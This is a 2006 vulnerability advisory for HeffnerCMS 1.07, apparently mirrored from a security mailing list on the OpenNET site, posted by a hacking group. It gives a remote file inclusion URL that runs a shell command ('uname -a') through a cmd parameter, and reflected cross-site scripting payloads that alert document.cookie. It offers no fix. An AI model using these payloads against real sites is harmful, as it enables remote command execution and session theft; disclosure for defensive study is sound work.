The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


HeffnerCMS Remote Command Exucetion And Cross Scripting Attack


<< Previous INDEX Search src / Print Next >>
Date: 24 Mar 2006 17:47:26 -0000
From: [email protected]
To: [email protected]
Subject: HeffnerCMS Remote Command Exucetion And Cross Scripting Attack
X-Virus-Scanned: antivirus-gw at tyumen.ru

Website : http://www.christian-heffner.de

Version : 1.07

I.

<?php

  $filename="index.php";

  require_once 'vlib/vlibTemplate.php';

        $tmpl = new vlibTemplate('tmpl/std/index.tpl');
        
        require_once 'config/db_config.php';

        require_once 'config/pcfunctions.php';


Ucuyor.... :) lol

II. Vulnerable code ;


http://www.site.com/index.php?page=evilcode.txt?&cmd=uname -a

III. Cross Scripting Attack

http://www.site.com/index.php?page=<script>alert(document.cookie)</script>

http://www.site.com/index.php?page=<script>alert(Patriotic Hackers)</script>

Etc..

IV. Solution 

No

Greetz ; B3g0k,Azad,Nistiman,Hawar,Seyh and other our friends.. 

irc.gigachat.net #kurdhack

www.PatrioticHackers


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру